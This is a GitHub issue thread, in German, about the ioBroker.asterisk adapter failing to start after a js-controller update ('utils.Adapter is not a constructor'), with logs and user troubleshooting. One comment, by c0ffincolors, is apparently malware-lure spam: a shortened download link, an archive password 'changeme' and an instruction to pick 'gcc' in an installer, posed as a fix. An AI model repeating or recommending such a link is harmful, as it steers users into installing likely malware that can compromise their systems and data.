### ISSUE TITLE
Kein starten mehr nach Update der Js Version 

### ISSUE THREAD

**Issue by darkdevil373** [schmupu/ioBroker.asterisk#36]
Hi,

ich habe heute meinen IoBroker aktualisiert unter anderem auch die JS Version auf 6.0.9

seitdem startet der Adapter nicht mehr, im log bekomme ich minütlich folgende Meldungen:

`  instance system.adapter.asterisk.0 terminated with code 1 (JS_CONTROLLER_STOPPED)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: Node.js v18.17.1

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at node:internal/main/run_main_module:23:47

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:81:12)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Module._load (node:internal/modules/cjs/loader:960:12)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Module.load (node:internal/modules/cjs/loader:1119:32)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Module._extensions..js (node:internal/modules/cjs/loader:1310:10)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Module._compile (node:internal/modules/cjs/loader:1256:14)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at Object.<anonymous> (/opt/iobroker/node_modules/iobroker.asterisk/asterisk.js:818:3)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: at startAdapter (/opt/iobroker/node_modules/iobroker.asterisk/asterisk.js:23:13)

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: TypeError: utils.Adapter is not a constructor

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: ^

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: adapter = new utils.Adapter(options);

host.iobroker-produktiv
2024-08-27 16:09:13.239	error	Caught by controller[0]: /opt/iobroker/node_modules/iobroker.asterisk/asterisk.js:23  `

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by vaaarg** [comment]
mir hats das gestern auch völlig zerschlagen.

**Comment by darkdevil373** [comment]
Bei mir funktioniert der Adapter nach einem Neustart des ganzen Systems wieder

**Comment by vaaarg** [comment]
ja bei mir nicht mit Pi5 

`Plattform:
linux
Betriebssystem:
linux
Architektur:
arm64
CPUs:
4
Geschwindigkeit:
2400 MHz
Modell:
Cortex-A76
RAM:
7.8 GB
System-Betriebszeit:
23:28:41
Node.js:
v20.17.0
time:
1725775355803
NPM:
10.8.2
Adapter-Anzahl:
540
Datenträgergröße:
28.7 GB
Freier Festplattenspeicher:
21.3 GB
Aktive Instanzen:
15
Pfad:
/opt/iobroker/
Betriebszeit:
22:34:40`

**Comment by vaaarg** [comment]
Hast Du es auf dem Weg installiert ?

[klick](https://github.com/schmupu/ioBroker.asterisk/blob/master/docs/SIP_FRITZBOX_DE.md)

**Comment by darkdevil373** [comment]
Ja, damals hatte ich es wie in der Anleitung installiert.
